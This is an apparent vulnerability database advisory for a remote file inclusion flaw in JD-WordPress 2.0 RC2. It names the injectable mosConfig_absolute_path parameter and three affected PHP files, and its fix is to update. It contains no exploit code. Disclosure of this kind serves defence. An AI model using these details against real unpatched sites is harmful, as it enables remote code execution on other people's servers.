JD-WordPress 2.0 RC2 - Remote file inclusion

jd-wordpress

Software
JD WordPress
Versions
2.0
Disclosure date
2009-10-19
CVE
CVE-N/A
References
Credits
Classification
Remote File Inclusion
OWASP Top 10

Are your websites subject to this vulnerability?

Details

The vulnerabilities in JD-WordPress allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) wp-comments-post.php, (2) wp-feed.php, or (3) wp-trackback.php.

Solution

Update WordPress.

Found a vulnerability that puts your sites at risk?

Found a vulnerability? Help us secure the web and join our community of ethical hackers.

Are you the developer of this software? Hire our researchers for a thorough security audit.